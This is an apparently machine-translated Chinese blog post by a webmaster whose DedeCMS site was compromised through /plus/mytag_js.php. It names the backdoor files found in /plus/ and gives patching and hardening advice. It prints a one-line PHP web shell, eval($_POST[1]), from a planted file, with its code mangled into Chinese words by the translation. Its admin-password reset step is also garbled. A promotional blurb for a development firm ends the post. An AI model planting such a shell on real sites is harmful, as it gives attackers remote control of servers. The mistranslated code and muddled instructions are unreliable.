dedecms一直是非常受歡迎的建站cms,主要得益于兩大站長(zhǎng)網(wǎng)的全力支持;但是人多,cms太流行,也會(huì)被別有用心的人盯上。我的網(wǎng)站一直在用dedecms,前段時(shí)間又被攻擊了。攻擊的目的很簡(jiǎn)單,就是黑鏈接。知道后,稍微修改一下代碼,就恢復(fù)了。不是很嚴(yán)重;期間網(wǎng)站莫名上傳文件,與上次類似,雖然對(duì)方還沒有來得及修改網(wǎng)站模板,但這說明該網(wǎng)站的安全防范措施還沒有到位,對(duì)方可能隨時(shí)重新獲得管理員權(quán)限,因此應(yīng)特別注意站點(diǎn)的安全防范措施。
因?yàn)橄矚g追根究底,所以去網(wǎng)上找了相關(guān)資料,發(fā)現(xiàn)這確實(shí)是dedecms的一個(gè)漏洞。黑客可以使用多維變量來繞過常規(guī)檢測(cè)。該漏洞主要出現(xiàn)在/plus/mytag_js.php。原理很簡(jiǎn)單,準(zhǔn)備一個(gè)MySQL數(shù)據(jù)庫,攻擊已知網(wǎng)站的數(shù)據(jù)庫。通過在數(shù)據(jù)庫中寫入一段代碼,只要寫入成功,以后就可以利用這些代碼獲取后臺(tái)管理員權(quán)限。
結(jié)合我的網(wǎng)站被攻擊和其他人的類似經(jīng)歷,黑客編寫的文件主要存在于/plus/文件夾中。目前已知的文件有g(shù)a.php、log.php、b.php、b1.php等,文件的特點(diǎn)是體積短,內(nèi)容少,寫起來可能不是很方便,但是這些文件的功能代碼量確實(shí)不小。
這是ga.php 文件中的部分代碼:
不
評(píng)估($_POST[1])
?
不
評(píng)估($_POST[1])
?
不
評(píng)估($_POST[1])
?
實(shí)際代碼比上面截取的要長(zhǎng)一些,不過是這段代碼的重復(fù)。至于log.php的代碼,和這一段差不多,只有一句話,簡(jiǎn)單明了。 PHP 是一個(gè)單句木馬??梢允褂靡恍┲付ǖ墓ぞ邅韴?zhí)行此代碼。預(yù)計(jì)是破解密碼的功能。
既然知道了對(duì)方利用了什么樣的漏洞,同時(shí)也知道了對(duì)方利用了什么樣的原理來鉆空子,那么如何才能避免這些危險(xiǎn)的事情發(fā)生呢?查閱了很多資料,初步整理出以下預(yù)防漏洞被利用希望對(duì)同樣應(yīng)用dedecms的站長(zhǎng)朋友有所幫助。
1.升級(jí)版本打補(bǔ)丁設(shè)置目錄權(quán)限
這是對(duì)此的官方解決方案。不管你用的是什么版本的dedecms,都必須在后臺(tái)升級(jí)版本,及時(shí)自動(dòng)更新補(bǔ)丁。這是避免漏洞被利用的最重要的一步;同時(shí)官方也提供了設(shè)置目錄的方法,主要是設(shè)置data、templets、uploads、a為讀寫和不可執(zhí)行的權(quán)限; include、member、plus、后臺(tái)管理目錄等設(shè)置可執(zhí)行、可讀、不可寫權(quán)限;刪除install和special目錄,看官方說明如何設(shè)置。
2.修改admin賬號(hào)和密碼
黑客可能會(huì)使用默認(rèn)的admin賬號(hào),通過猜測(cè)密碼進(jìn)行破解,所以修改默認(rèn)的admin賬號(hào)非常重要。至于怎么修改,有很多種方法。比較有效的方法是用phpadmin登錄網(wǎng)站數(shù)據(jù)庫,找到dede_admin數(shù)據(jù)庫表(dede是數(shù)據(jù)庫表前綴),修改userid和pwd,密碼一定要改成f297a57a5a743894a0e4,也就是默認(rèn)密碼admin ;修改后去后臺(tái)登錄,登錄dede后臺(tái)后修改密碼。
三、其他注意事項(xiàng)
至于更多的細(xì)節(jié),也要注意,盡量不要選擇太便宜的空間,太便宜的空間容易出現(xiàn)服務(wù)器本身的安全問題,只要服務(wù)器出了問題,服務(wù)器下的整個(gè)網(wǎng)站都會(huì)丟失.還有,如果不是必須的,盡量不要開會(huì)員注冊(cè)什么的,用起來很麻煩;至于網(wǎng)站的后臺(tái)目錄,不要寫在robots.txt里,至少一個(gè)月?lián)Q一次。替換它以避免猜測(cè)它與其他帳戶密碼相同。
經(jīng)過幾次網(wǎng)站被攻擊,不得不說,互聯(lián)網(wǎng)不是一個(gè)可以安枕無憂的網(wǎng)絡(luò)。作為站長(zhǎng),你可以看作是一個(gè)編織網(wǎng)絡(luò)的人,更應(yīng)該注意網(wǎng)絡(luò)安全;只要按照要求做好這些防范措施,別說100%,至少95%都可能無法成功獲得后臺(tái)權(quán)限。
我們專注高端建站,小程序開發(fā)、軟件系統(tǒng)定制開發(fā)、BUG修復(fù)、物聯(lián)網(wǎng)開發(fā)、各類API接口對(duì)接開發(fā)等。十余年開發(fā)經(jīng)驗(yàn),每一個(gè)項(xiàng)目承諾做到滿意為止,多一次對(duì)比,一定讓您多一份收獲!